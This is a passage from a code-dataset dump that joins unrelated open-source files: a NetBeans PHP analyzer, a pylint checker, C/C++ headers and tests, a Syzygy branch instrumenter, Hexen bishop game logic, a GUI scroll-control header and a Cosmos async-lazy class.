        context.start(totalCount);
        try {
            return doAnalyze(scope, codingStandardsFixer, codingStandardsFixerParams, fileCount);
        } finally {
            // Always close the progress handle, even on cancellation/problems.
            context.finish();
        }
    }
    @Override
    public boolean cancel() {
        cancelled.set(true);
        // XXX cancel coding standards fixer?
        return true;
    }
    @NbBundle.Messages({
        "CodingStandardsFixerAnalyzerImpl.analyze.error=Coding standards fixer analysis error",
        "CodingStandardsFixerAnalyzerImpl.analyze.error.description=Error occurred during coding standards fixer analysis, review Output window for more information.",
    })
    private Iterable<? extends ErrorDescription> doAnalyze(Scope scope, CodingStandardsFixer codingStandardsFixer,
            CodingStandardsFixerParams params, Map<FileObject, Integer> fileCount) {
        // Runs the fixer once per source root, then per file, then per
        // (non-recursive) folder, accumulating mapped results. Cancellation is
        // checked before each item; any tool failure aborts the whole run.
        List<ErrorDescription> errors = new ArrayList<>();
        int progress = 0;
        codingStandardsFixer.startAnalyzeGroup();
        for (FileObject root : scope.getSourceRoots()) {
            if (cancelled.get()) {
                return Collections.emptyList();
            }
            List<org.netbeans.modules.php.analysis.results.Result> results = codingStandardsFixer.analyze(params, root);
            if (results == null) {
                // null == tool failure (not "no findings"); report and abort.
                context.reportAnalysisProblem(
                        Bundle.CodingStandardsFixerAnalyzerImpl_analyze_error(),
                        Bundle.CodingStandardsFixerAnalyzerImpl_analyze_error_description());
                return Collections.emptyList();
            }
            errors.addAll(Mappers.map(results));
            progress += fileCount.get(root);
            context.progress(progress);
        }
        for (FileObject file : scope.getFiles()) {
            if (cancelled.get()) {
                return Collections.emptyList();
            }
            List<org.netbeans.modules.php.analysis.results.Result> results = codingStandardsFixer.analyze(params, file);
            if (results == null) {
                context.reportAnalysisProblem(
                        Bundle.CodingStandardsFixerAnalyzerImpl_analyze_error(),
                        Bundle.CodingStandardsFixerAnalyzerImpl_analyze_error_description());
                return Collections.emptyList();
            }
            errors.addAll(Mappers.map(results));
            progress += fileCount.get(file);
            context.progress(progress);
        }
        for (NonRecursiveFolder nonRecursiveFolder : scope.getFolders()) {
            if (cancelled.get()) {
                return Collections.emptyList();
            }
            FileObject folder = nonRecursiveFolder.getFolder();
            List<org.netbeans.modules.php.analysis.results.Result> results = codingStandardsFixer.analyze(params, folder);
            if (results == null) {
                context.reportAnalysisProblem(
                        Bundle.CodingStandardsFixerAnalyzerImpl_analyze_error(),
                        Bundle.CodingStandardsFixerAnalyzerImpl_analyze_error_description());
                return Collections.emptyList();
            }
            errors.addAll(Mappers.map(results));
            progress += fileCount.get(folder);
            context.progress(progress);
        }
        return errors;
    }
    /**
     * Resolves the fixer executable: a custom path from the customizer
     * settings if given, otherwise the globally configured default.
     * Returns {@code null} (after logging) if the executable is invalid.
     */
    @CheckForNull
    private CodingStandardsFixer getValidCodingStandardsFixer() {
        Preferences settings = context.getSettings();
        String codingStandardsFixerPath = null;
        if (settings != null) {
            codingStandardsFixerPath = settings.get(CodingStandardsFixerCustomizerPanel.PATH, null);
        }
        try {
            if (StringUtils.hasText(codingStandardsFixerPath)) {
                return CodingStandardsFixer.getCustom(codingStandardsFixerPath);
            }
            return CodingStandardsFixer.getDefault();
        } catch (InvalidPhpExecutableException ex) {
            LOGGER.log(Level.INFO, null, ex);
        }
        return null;
    }
    // Customizer setting wins; IDE Options value is the fallback.
    private String getValidCodingStandardsFixerVersion() {
        String codingStandardsFixerVersion = null;
        Preferences settings = context.getSettings();
        if (settings != null) {
            codingStandardsFixerVersion = settings.get(CodingStandardsFixerCustomizerPanel.VERSION, null);
        }
        if (codingStandardsFixerVersion == null) {
            codingStandardsFixerVersion = AnalysisOptions.getInstance().getCodingStandardsFixerVersion();
        }
        assert codingStandardsFixerVersion != null;
        return codingStandardsFixerVersion;
    }
    // Customizer setting wins; IDE Options value is the fallback.
    @CheckForNull
    private String getValidCodingStandardsFixerLevel() {
        String codingStandardsFixerLevel = null;
        Preferences settings = context.getSettings();
        if (settings != null) {
            codingStandardsFixerLevel = settings.get(CodingStandardsFixerCustomizerPanel.LEVEL, null);
        }
        if (codingStandardsFixerLevel == null) {
            codingStandardsFixerLevel = AnalysisOptions.getInstance().getCodingStandardsFixerLevel();
        }
        assert codingStandardsFixerLevel != null;
        return codingStandardsFixerLevel;
    }
    // Customizer setting wins; IDE Options value is the fallback.
    @CheckForNull
    private String getValidCodingStandardsFixerConfig() {
        String codingStandardsFixerConfig = null;
        Preferences settings = context.getSettings();
        if (settings != null) {
            codingStandardsFixerConfig = settings.get(CodingStandardsFixerCustomizerPanel.CONFIG, null);
        }
        if (codingStandardsFixerConfig == null) {
            codingStandardsFixerConfig = AnalysisOptions.getInstance().getCodingStandardsFixerConfig();
        }
        assert codingStandardsFixerConfig != null;
        return codingStandardsFixerConfig;
    }
    // Customizer setting wins; IDE Options value is the fallback.
    @CheckForNull
    private String getValidCodingStandardsFixerOptions() {
        String codingStandardsFixerOptions = null;
        Preferences settings = context.getSettings();
        if (settings != null) {
            codingStandardsFixerOptions = settings.get(CodingStandardsFixerCustomizerPanel.OPTIONS, null);
        }
        if (codingStandardsFixerOptions == null) {
            codingStandardsFixerOptions = AnalysisOptions.getInstance().getCodingStandardsFixerOptions();
        }
        assert codingStandardsFixerOptions != null;
        return codingStandardsFixerOptions;
    }
    //~ Inner class
    /**
     * Factory registered with the analysis framework; creates analyzer
     * instances and supplies the customizer panel.
     */
    @ServiceProvider(service = AnalyzerFactory.class)
    public static final class CodingStandardsFixerAnalyzerFactory extends AnalyzerFactory {
        @StaticResource
        private static final String ICON_PATH = "org/netbeans/modules/php/analysis/ui/resources/coding-standards-fixer.png"; // NOI18N
        @NbBundle.Messages("CodingStandardsFixerAnalyzerFactory.displayName=Coding Standards Fixer")
        public CodingStandardsFixerAnalyzerFactory() {
            super("PhpCodingStandardsFixer", Bundle.CodingStandardsFixerAnalyzerFactory_displayName(), ICON_PATH);
        }
        @Override
        public Iterable<? extends WarningDescription> getWarnings() {
            // Warnings are produced dynamically by the tool, none are predeclared.
            return Collections.emptyList();
        }
        @Override
        public CustomizerProvider<Void, CodingStandardsFixerCustomizerPanel> getCustomizerProvider() {
            return new CustomizerProvider<Void, CodingStandardsFixerCustomizerPanel>() {
                @Override
                public Void initialize() {
                    return null;
                }
                @Override
                public CodingStandardsFixerCustomizerPanel createComponent(CustomizerContext<Void, CodingStandardsFixerCustomizerPanel> context) {
                    return new CodingStandardsFixerCustomizerPanel(context);
                }
            };
        }
        @Override
        public Analyzer createAnalyzer(Context context) {
            return new CodingStandardsFixerAnalyzerImpl(context);
        }
    }
}
| 4,700 |
463 | <gh_stars>100-1000
# Copyright (c) 2021 <NAME> <<EMAIL>>
# Copyright (c) 2021 <NAME> <<EMAIL>>
# Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html
# For details: https://github.com/PyCQA/pylint/blob/master/LICENSE
import astroid
from pylint.checkers import BaseChecker
from pylint.checkers.utils import check_messages
from pylint.interfaces import IAstroidChecker
from pylint.lint import PyLinter
class ConfusingConsecutiveElifChecker(BaseChecker):
    """Checks if "elif" is used right after an indented block that finishes with "if" or "elif" itself."""

    __implements__ = IAstroidChecker

    name = "confusing-elif-checker"
    priority = -1
    msgs = {
        "R5601": (
            "Consecutive elif with differing indentation level, consider creating a function to separate the inner elif",
            "confusing-consecutive-elif",
            "Used when an elif statement follows right after an indented block which itself ends with if or elif. "
            # Fixed typo in user-facing help text: "ovious" -> "obvious".
            "It may not be obvious if the elif statement was willingly or mistakenly unindented. "
            "Extracting the indented if statement into a separate function might avoid confusion and prevent errors.",
        )
    }

    @check_messages("confusing-consecutive-elif")
    def visit_if(self, node: astroid.If):
        """Flag an outer `elif` that directly follows a nested trailing if/elif."""
        # True when the body's last statement is an if/elif chain without a
        # final `else` — the situation where a following `elif` is ambiguous.
        body_ends_with_if = isinstance(
            node.body[-1], astroid.If
        ) and self._has_no_else_clause(node.body[-1])
        if node.has_elif_block() and body_ends_with_if:
            self.add_message("confusing-consecutive-elif", node=node.orelse[0])

    @staticmethod
    def _has_no_else_clause(node: astroid.If):
        """Return True if the if/elif chain rooted at ``node`` has no ``else``."""
        # In astroid an `elif` is an If node stored inside its parent's orelse;
        # walk the chain until a non-If (real else) or an empty orelse is found.
        orelse = node.orelse
        while orelse and isinstance(orelse[0], astroid.If):
            orelse = orelse[0].orelse
        if not orelse or isinstance(orelse[0], astroid.If):
            return True
        return False
def register(linter: PyLinter):
    """Required plugin entry point: auto-registers the checker with pylint.

    :param linter: The linter to register the checker to.
    :type linter: pylint.lint.PyLinter
    """
    linter.register_checker(ConfusingConsecutiveElifChecker(linter))
| 858 |
7,158 | // This file is part of OpenCV project.
// It is subject to the license terms in the LICENSE file found in the top-level directory
// of this distribution and at http://opencv.org/license.html.
#include "test_precomp.hpp"
// Adds the optional extra test-data location (from OPENCV_DNN_TEST_DATA_PATH)
// to the test framework's search paths before the tracking tests run.
// WinRT has no getenv, so the path is compiled out there.
static
void initTrackingTests()
{
    const char* extraTestDataPath =
#ifdef WINRT
        NULL;
#else
        getenv("OPENCV_DNN_TEST_DATA_PATH");
#endif
    if (extraTestDataPath)
        cvtest::addDataSearchPath(extraTestDataPath);
    cvtest::addDataSearchSubDirectory("");  // override "cv" prefix below to access without "../dnn" hacks
}
// Expands to main(): runs the "cv" test suite after initTrackingTests().
CV_TEST_MAIN("cv", initTrackingTests())
12,278 | <filename>libs/coroutine/performance/cycle_i386.hpp
// Copyright <NAME> 2009.
// Distributed under the Boost Software License, Version 1.0.
// (See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt)
#ifndef CYCLE_I386_H
#define CYCLE_I386_H

#include <algorithm>
#include <numeric>
#include <cstddef>
#include <vector>

#include <boost/assert.hpp>
#include <boost/bind.hpp>
#include <boost/cstdint.hpp>

#define BOOST_CONTEXT_CYCLE

// 64-bit timestamp-counter value (TSC ticks).
typedef boost::uint64_t cycle_type;

#if _MSC_VER
// Reads the TSC; cpuid serializes the pipeline so earlier instructions
// cannot be reordered past the measurement.
inline
cycle_type cycles()
{
    cycle_type c;
    __asm {
        cpuid
        rdtsc
        mov dword ptr [c + 0], eax
        mov dword ptr [c + 4], edx
    }
    return c;
}
#elif defined(__GNUC__) || \
    defined(__INTEL_COMPILER) || defined(__ICC) || defined(_ECC) || defined(__ICL)
// Reads the TSC; the surrounding cpuid instructions act as serializing
// barriers on both sides of rdtsc.
inline
cycle_type cycles()
{
    boost::uint32_t lo, hi;

    __asm__ __volatile__ (
        "xorl %%eax, %%eax\n"
        "cpuid\n"
        ::: "%eax", "%ebx", "%ecx", "%edx"
    );
    __asm__ __volatile__ ("rdtsc" : "=a" (lo), "=d" (hi) );
    __asm__ __volatile__ (
        "xorl %%eax, %%eax\n"
        "cpuid\n"
        ::: "%eax", "%ebx", "%ecx", "%edx"
    );
    return ( cycle_type)hi << 32 | lo;
}
#else
# error "this compiler is not supported"
#endif

// Functor measuring the cost of one back-to-back cycles() pair, i.e. the
// measurement overhead itself.
struct cycle_overhead
{
    cycle_type operator()()
    {
        cycle_type start( cycles() );
        return cycles() - start;
    }
};

// Returns the average measurement overhead over several samples; subtract
// this from raw timings.
inline
cycle_type overhead_cycle()
{
    std::size_t iterations( 10);
    std::vector< cycle_type > overhead( iterations, 0);
    // Refill the sample vector several times; the final pass provides the
    // (warmed-up) samples that are averaged below.
    for ( std::size_t i( 0); i < iterations; ++i)
        std::generate(
            overhead.begin(), overhead.end(),
            cycle_overhead() );
    BOOST_ASSERT( overhead.begin() != overhead.end() );
    // BUGFIX: accumulate with a cycle_type init value. The previous literal
    // `0` made std::accumulate sum 64-bit cycle counts into a signed 32-bit
    // int, truncating and potentially overflowing (undefined behavior).
    return std::accumulate( overhead.begin(), overhead.end(), cycle_type( 0) ) / iterations;
}

#endif // CYCLE_I386_H
| 866 |
360 | <gh_stars>100-1000
/*-------------------------------------------------------------------------
*
* pgut.h
*
* Portions Copyright (c) 2020 Huawei Technologies Co.,Ltd.
* Portions Copyright (c) 2009-2013, NIPPON TELEGRAPH AND TELEPHONE CORPORATION
* Portions Copyright (c) 2017-2019, Postgres Professional
*
*-------------------------------------------------------------------------
*/
#ifndef PGUT_H
#define PGUT_H
#include "postgres_fe.h"
#include "libpq/libpq-fe.h"
typedef void (*pgut_atexit_callback)(bool fatal, void *userdata);
extern void pgut_help(bool details);
/*
* pgut framework variables and functions
*/
extern bool prompt_password;
extern bool interrupted;
extern bool in_cleanup;
extern bool in_password; /* User prompts password */
extern void pgut_atexit_push(pgut_atexit_callback callback, void *userdata);
extern void pgut_atexit_pop(pgut_atexit_callback callback, void *userdata);
extern void pgut_init(void);
extern void on_cleanup(void);
/*
* Database connections
*/
extern PGconn *pgut_connect(const char *host, const char *port,
const char *dbname, const char *username);
extern PGconn *pgut_connect_replication(const char *host, const char *port,
const char *dbname,
const char *username);
extern void pgut_disconnect(PGconn *conn);
extern void pgut_disconnect_callback(bool fatal, void *userdata);
extern PGresult *pgut_execute(PGconn* conn, const char *query, int nParams,
const char **params);
extern PGresult *pgut_execute_extended(PGconn* conn, const char *query, int nParams,
const char **params, bool text_result, bool ok_error);
extern PGresult *pgut_execute_parallel(PGconn* conn, PGcancel* thread_cancel_conn,
const char *query, int nParams,
const char **params, bool text_result, bool ok_error, bool async);
extern bool pgut_send(PGconn* conn, const char *query, int nParams, const char **params, int elevel);
extern void pgut_cancel(PGconn* conn);
extern int pgut_wait(int num, PGconn *connections[], struct timeval *timeout);
/*
* memory allocators
*/
extern void *pgut_malloc(size_t size);
extern void *pgut_realloc(void *p, size_t oldSize, size_t size);
extern char *pgut_strdup(const char *str);
#define pgut_new(type) ((type *) pgut_malloc(sizeof(type)))
#define pgut_newarray(type, n) ((type *) pgut_malloc(sizeof(type) * (n)))
/*
* file operations
*/
extern FILE *pgut_fopen(const char *path, const char *mode, bool missing_ok);
/*
* Assert
*/
#undef Assert
#undef AssertArg
#undef AssertMacro
#ifdef USE_ASSERT_CHECKING
#define Assert(x) assert(x)
#define AssertArg(x) assert(x)
#define AssertMacro(x) assert(x)
#else
#define Assert(x) ((void) 0)
#define AssertArg(x) ((void) 0)
#define AssertMacro(x) ((void) 0)
#endif
#define IsSpace(c) (isspace((unsigned char)(c)))
#define IsAlpha(c) (isalpha((unsigned char)(c)))
#define IsAlnum(c) (isalnum((unsigned char)(c)))
#define ToLower(c) (tolower((unsigned char)(c)))
#define ToUpper(c) (toupper((unsigned char)(c)))
/*
* socket operations
*/
extern int wait_for_socket(int sock, struct timeval *timeout);
extern int wait_for_sockets(int nfds, fd_set *fds, struct timeval *timeout);
#ifdef WIN32
extern int sleep(unsigned int seconds);
extern int usleep(unsigned int usec);
#endif
#endif /* PGUT_H */
| 1,780 |
3,673 | #include "common.hpp"
#include <fcntl.h>
#include <sys/types.h>
#include <unistd.h>
#include <posix/fd_map.hpp>
// Looks the descriptor up in the process FD map and delegates to that
// descriptor's lseek; returns -EBADF (negative-errno convention) for an
// unknown fd.
static off_t sys_lseek(int fd, off_t offset, int whence)
{
  if(auto* fildes = FD_map::_get(fd); fildes)
      return fildes->lseek(offset, whence);
  return -EBADF;
}
// _llseek is not implemented: unconditionally reports -ENOSYS.
static off_t sys__llseek(unsigned int /*fd*/, unsigned long /*offset_high*/,
                         unsigned long /*offset_low*/, loff_t* /*result*/,
                         unsigned int /*whence*/) {
  return -ENOSYS;
}
// C-linkage syscall entry point; strace() wraps the handler to provide
// optional syscall tracing.
extern "C"
off_t syscall_SYS_lseek(int fd, off_t offset, int whence) {
  return strace(sys_lseek, "lseek", fd, offset, whence);
}
// C-linkage entry point for the (unimplemented) _llseek syscall, traced via
// strace() like the other syscall wrappers in this file.
extern "C"
off_t syscall_SYS__llseek(unsigned int fd, unsigned long offset_high,
                          unsigned long offset_low, loff_t *result,
                          unsigned int whence) {
  return strace(sys__llseek, "_llseek", fd, offset_high, offset_low,
                result, whence);
}
| 432 |
343 | // Copyright 2013 Google Inc. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#include "syzygy/instrument/instrumenters/branch_instrumenter.h"
#include "base/logging.h"
#include "base/files/file_util.h"
#include "base/strings/string_number_conversions.h"
#include "syzygy/application/application.h"
#include "syzygy/pe/image_filter.h"
namespace instrument {
namespace instrumenters {
const char BranchInstrumenter::kAgentDllBasicBlockEntry[] =
"basic_block_entry_client.dll";
const uint32_t kNumSlots = 4U;
// Defaults: no buffering, no FS slot (0 = disabled), and the basic-block
// entry client DLL as the instrumentation agent.
BranchInstrumenter::BranchInstrumenter()
    : buffering_(false), fs_slot_(0U) {
  agent_dll_ = kAgentDllBasicBlockEntry;
}
// No preparation work is needed for branch instrumentation.
bool BranchInstrumenter::InstrumentPrepare() {
  return true;
}
// Configures the branch-hook transform from the parsed command-line options
// and appends it, plus a PDB mutator that records the basic-block address
// ranges, to the relinker. Returns false if either append fails.
bool BranchInstrumenter::InstrumentImpl() {
  branch_transform_.reset(
      new instrument::transforms::BranchHookTransform());
  branch_transform_->set_instrument_dll_name(agent_dll_);
  branch_transform_->set_buffering(buffering_);
  branch_transform_->set_fs_slot(fs_slot_);
  if (!relinker_->AppendTransform(branch_transform_.get()))
    return false;
  // Persist the instrumented basic-block ranges into the PDB so tooling can
  // map collected data back to code.
  add_bb_addr_stream_mutator_.reset(new
      instrument::mutators::AddIndexedDataRangesStreamPdbMutator(
          branch_transform_->bb_ranges(),
          common::kBasicBlockRangesStreamName));
  if (!relinker_->AppendPdbMutator(add_bb_addr_stream_mutator_.get()))
    return false;
  return true;
}
// Parses branch-specific switches after the base class has handled the
// common ones: --buffering (boolean) and --fs-slot (integer in [1, kNumSlots]).
// Returns false on any invalid value.
bool BranchInstrumenter::DoCommandLineParse(
    const base::CommandLine* command_line) {
  if (!Super::DoCommandLineParse(command_line))
    return false;
  // Parse the additional command line arguments.
  buffering_ = command_line->HasSwitch("buffering");
  if (command_line->HasSwitch("fs-slot")) {
    std::string fs_slot_str = command_line->GetSwitchValueASCII("fs-slot");
    if (!base::StringToUint(fs_slot_str, &fs_slot_)) {
      LOG(ERROR) << "Unrecognized FS-slot: not a valid number.";
      return false;
    }
    // Slot 0 is reserved (means "disabled"), so only 1..kNumSlots are valid.
    if (fs_slot_ == 0 || fs_slot_ > kNumSlots) {
      LOG(ERROR) << "fs-slot must be from 1 to " << kNumSlots << ".";
      return false;
    }
  }
  return true;
}
} // namespace instrumenters
} // namespace instrument
| 902 |
638 | {
// Consultez https://go.microsoft.com/fwlink/?LinkId=733558
// pour voir la documentation sur le format de tasks.json
"version": "2.0.0",
"tasks": [
{
"type": "haxe",
"args": "active configuration",
"group": {
"kind": "build",
"isDefault": true
}
}
]
} | 124 |
852 | #ifndef CondTools_L1Trigger_L1CondDBPayloadWriter_h
#define CondTools_L1Trigger_L1CondDBPayloadWriter_h
// -*- C++ -*-
//
// Package: L1Trigger
// Class : L1CondDBPayloadWriter
//
/**\class L1CondDBPayloadWriter L1CondDBPayloadWriter.h CondTools/L1Trigger/interface/L1CondDBPayloadWriter.h
Description: <one line class summary>
Usage:
<usage>
*/
//
// Original Author:
// Created: Sun Mar 2 07:06:56 CET 2008
// $Id: L1CondDBPayloadWriter.h,v 1.6 2009/12/17 23:43:58 wmtan Exp $
//
// system include files
#include <memory>
// user include files
#include "FWCore/Framework/interface/Frameworkfwd.h"
#include "FWCore/Framework/interface/one/EDAnalyzer.h"
#include "FWCore/Framework/interface/Event.h"
#include "FWCore/Framework/interface/MakerMacros.h"
#include "FWCore/ParameterSet/interface/ParameterSet.h"
#include "CondTools/L1Trigger/interface/DataWriter.h"
// forward declarations
class L1TriggerKey;
class L1TriggerKeyRcd;
// EDAnalyzer that writes L1 trigger configuration payloads to the conditions
// database via l1t::DataWriter.
class L1CondDBPayloadWriter : public edm::one::EDAnalyzer<> {
public:
  explicit L1CondDBPayloadWriter(const edm::ParameterSet&);
  ~L1CondDBPayloadWriter() override;
private:
  void beginJob() override;
  void analyze(const edm::Event&, const edm::EventSetup&) override;
  void endJob() override;
  // ----------member data ---------------------------
  // Helper performing the actual condition-DB writes.
  l1t::DataWriter m_writer;
  // std::string m_tag ; // tag is known by PoolDBOutputService
  // set to false to write config data without valid TSC key
  bool m_writeL1TriggerKey;
  // set to false to write config data only
  bool m_writeConfigData;
  // substitute new payload tokens for existing keys in L1TriggerKeyList
  bool m_overwriteKeys;
  // NOTE(review): presumably enables transaction logging in DataWriter —
  // confirm against the implementation.
  bool m_logTransactions;
  // if true, do not retrieve L1TriggerKeyList from EventSetup
  bool m_newL1TriggerKeyList;
  edm::ESGetToken<L1TriggerKey, L1TriggerKeyRcd> l1TriggerKeyToken_;
};
#endif
| 642 |
1,102 | <reponame>johny-c/ViZDoom<filename>src/vizdoom/src/g_hexen/a_bishop.cpp<gh_stars>1000+
/*
#include "actor.h"
#include "info.h"
#include "p_local.h"
#include "s_sound.h"
#include "a_action.h"
#include "m_random.h"
#include "a_hexenglobal.h"
#include "thingdef/thingdef.h"
*/
static FRandom pr_boom ("BishopBoom");
static FRandom pr_atk ("BishopAttack");
static FRandom pr_decide ("BishopDecide");
static FRandom pr_doblur ("BishopDoBlur");
static FRandom pr_sblur ("BishopSpawnBlur");
static FRandom pr_pain ("BishopPainBlur");
//============================================================================
//
// A_BishopAttack
//
//============================================================================
DEFINE_ACTION_FUNCTION(AActor, A_BishopAttack)
{
	if (!self->target)
	{ // Nothing to attack.
		return;
	}
	S_Sound (self, CHAN_BODY, self->AttackSound, 1, ATTN_NORM);
	if (self->CheckMeleeRange())
	{ // In melee range: deal direct damage and bleed.
		int damage = pr_atk.HitDice (4);
		int newdam = P_DamageMobj (self->target, self, self, damage, NAME_Melee);
		P_TraceBleed (newdam > 0 ? newdam : damage, self->target, self);
		return;
	}
	// Out of melee range: queue 5..8 missiles; A_BishopAttack2 decrements
	// special1 once per shot.
	self->special1 = (pr_atk() & 3) + 5;
}
//============================================================================
//
// A_BishopAttack2
//
// Spawns one of a string of bishop missiles
//============================================================================
DEFINE_ACTION_FUNCTION(AActor, A_BishopAttack2)
{
	AActor *mo;
	if (!self->target || !self->special1)
	{ // Missile string exhausted (or target lost): back to the See state.
		self->special1 = 0;
		self->SetState (self->SeeState);
		return;
	}
	mo = P_SpawnMissile (self, self->target, PClass::FindClass("BishopFX"));
	if (mo != NULL)
	{
		// The missile homes on the bishop's current target via its tracer.
		mo->tracer = self->target;
	}
	self->special1--; // One fewer missile left in the string.
}
//============================================================================
//
// A_BishopMissileWeave
//
//============================================================================
DEFINE_ACTION_FUNCTION(AActor, A_BishopMissileWeave)
{
	// Delegate the weaving motion to the shared A_Weave helper.
	A_Weave(self, 2, 2, 2*FRACUNIT, FRACUNIT);
}
//============================================================================
//
// A_BishopDecide
//
//============================================================================
DEFINE_ACTION_FUNCTION(AActor, A_BishopDecide)
{
	// Roughly 220/256 of the time the bishop keeps doing what it is doing;
	// otherwise it enters its evasive "Blur" state.
	if (pr_decide() >= 220)
	{
		self->SetState (self->FindState ("Blur"));
	}
}
//============================================================================
//
// A_BishopDoBlur
//
//============================================================================
DEFINE_ACTION_FUNCTION(AActor, A_BishopDoBlur)
{
	self->special1 = (pr_doblur() & 3) + 3; // Random number of blurs
	// Dodge in a random direction: left, right, or straight ahead.
	if (pr_doblur() < 120)
	{
		P_ThrustMobj (self, self->angle + ANG90, 11*FRACUNIT);
	}
	else if (pr_doblur() > 125)
	{
		P_ThrustMobj (self, self->angle - ANG90, 11*FRACUNIT);
	}
	else
	{ // Thrust forward
		P_ThrustMobj (self, self->angle, 11*FRACUNIT);
	}
	S_Sound (self, CHAN_BODY, "BishopBlur", 1, ATTN_NORM);
}
//============================================================================
//
// A_BishopSpawnBlur
//
//============================================================================
DEFINE_ACTION_FUNCTION(AActor, A_BishopSpawnBlur)
{
	AActor *mo;
	if (!--self->special1)
	{ // Blur sequence finished: stop moving and pick the next behavior.
		self->velx = 0;
		self->vely = 0;
		if (pr_sblur() > 96)
		{
			self->SetState (self->SeeState);
		}
		else
		{
			self->SetState (self->MissileState);
		}
	}
	// Leave an after-image at the current position, facing the same way.
	mo = Spawn ("BishopBlur", self->Pos(), ALLOW_REPLACE);
	if (mo)
	{
		mo->angle = self->angle;
	}
}
//============================================================================
//
// A_BishopChase
//
//============================================================================
DEFINE_ACTION_FUNCTION(AActor, A_BishopChase)
{
	// Bob vertically: remove the sine offset for the old phase, advance the
	// 64-step phase counter (special2), and apply the offset for the new one.
	fixed_t newz = self->Z() - finesine[self->special2 << BOBTOFINESHIFT] * 4;
	self->special2 = (self->special2 + 4) & 63;
	newz += finesine[self->special2 << BOBTOFINESHIFT] * 4;
	self->SetZ(newz);
}
//============================================================================
//
// A_BishopPuff
//
//============================================================================
DEFINE_ACTION_FUNCTION(AActor, A_BishopPuff)
{
	AActor *mo;
	// Spawn a slowly rising puff 40 units above the bishop.
	mo = Spawn ("BishopPuff", self->PosPlusZ(40*FRACUNIT), ALLOW_REPLACE);
	if (mo)
	{
		mo->velz = FRACUNIT/2;
	}
}
//============================================================================
//
// A_BishopPainBlur
//
//============================================================================
DEFINE_ACTION_FUNCTION(AActor, A_BishopPainBlur)
{
	AActor *mo;
	if (pr_pain() < 64)
	{ // 64/256 chance: react to pain by entering the Blur state instead.
		self->SetState (self->FindState ("Blur"));
		return;
	}
	// Otherwise spawn a pain after-image at a small random offset.
	fixed_t xo = (pr_pain.Random2() << 12);
	fixed_t yo = (pr_pain.Random2() << 12);
	fixed_t zo = (pr_pain.Random2() << 11);
	mo = Spawn ("BishopPainBlur", self->Vec3Offset(xo, yo, zo), ALLOW_REPLACE);
	if (mo)
	{
		mo->angle = self->angle;
	}
}
| 1,845 |
310 | /*
!@
MIT License
Copyright (c) 2020 Skylicht Technology CO., LTD
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files
(the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify,
merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
This file is part of the "Skylicht Engine".
https://github.com/skylicht-lab/skylicht-engine
!#
*/
#pragma once
#include "CBase.h"
#include "CScrollBar.h"
namespace Skylicht
{
namespace Editor
{
namespace GUI
{
			// Container widget that scrolls its children via an optional
			// vertical and horizontal CScrollBar.
			class CScrollControl : public CBase
			{
			protected:
				CScrollBar* m_vertical;
				CScrollBar* m_horizontal;
				// Whether scrolling is enabled on each axis.
				bool m_canScrollV;
				bool m_canScrollH;
				// Extra space reserved beyond the children's bounds.
				float m_widthScrollExpand;
				float m_heightScrollExpand;
				// If true, children are resized to fit the inner width.
				bool m_modifyChildWidth;
			public:
				CScrollControl(CBase* parent);
				~CScrollControl();
				virtual void layout();
				virtual void onChildBoundsChanged(const SRect& oldChildBounds, CBase* child);
				virtual bool onMouseWheeled(int delta);
				// Scrollbar change callbacks.
				virtual void onScrollBarV(CBase* base);
				virtual void onScrollBarH(CBase* base);
				// Scrolls so that the given child becomes visible.
				void scrollToItem(CBase* item);
				void showScrollBar(bool h, bool v);
				void enableScroll(bool h, bool v);
				void enableModifyChildWidth(bool b)
				{
					m_modifyChildWidth = b;
				}
				float getInnerWidth();
				float getInnerHeight();
				// Current scroll offsets.
				float getScrollVertical();
				float getScrollHorizontal();
				void setScrollVertical(float y);
				void setScrollHorizontal(float x);
				inline CScrollBar* getVerticalScroll()
				{
					return m_vertical;
				}
				inline CScrollBar* getHorizontalScroll()
				{
					return m_horizontal;
				}
				// Relative scrolling by the given delta.
				void scrollVerticalOffset(float offset);
				void scrollHorizontalOffset(float offset);
			protected:
				void updateScrollBar();
			};
}
} | 887 |
1,350 | // Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License.
package com.azure.cosmos.implementation.caches;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import reactor.core.publisher.Mono;
import java.util.Optional;
import java.util.concurrent.Callable;
/**
 * Lazily-evaluated, memoized asynchronous value.
 *
 * The wrapped {@code Mono} is cached via {@code cache()}, so the underlying
 * computation runs at most once; its outcome is also mirrored into plain
 * volatile fields for cheap synchronous inspection.
 */
class AsyncLazy<TValue> {
    private final static Logger logger = LoggerFactory.getLogger(AsyncLazy.class);
    // Memoized source; every subscriber observes the same outcome.
    private final Mono<TValue> single;
    // Last successful value (null until the Mono succeeds).
    private volatile TValue value;
    // Set to true if the Mono terminated with an error.
    private volatile boolean failed;
    public AsyncLazy(Callable<Mono<TValue>> func) {
        // Defer the callable so it is not invoked until first subscription;
        // a throwing callable is converted into an error Mono.
        this(Mono.defer(() -> {
            logger.debug("using Function<Mono<TValue>> {}", func);
            try {
                return func.call();
            } catch (Exception e) {
                return Mono.error(e);
            }
        }));
    }
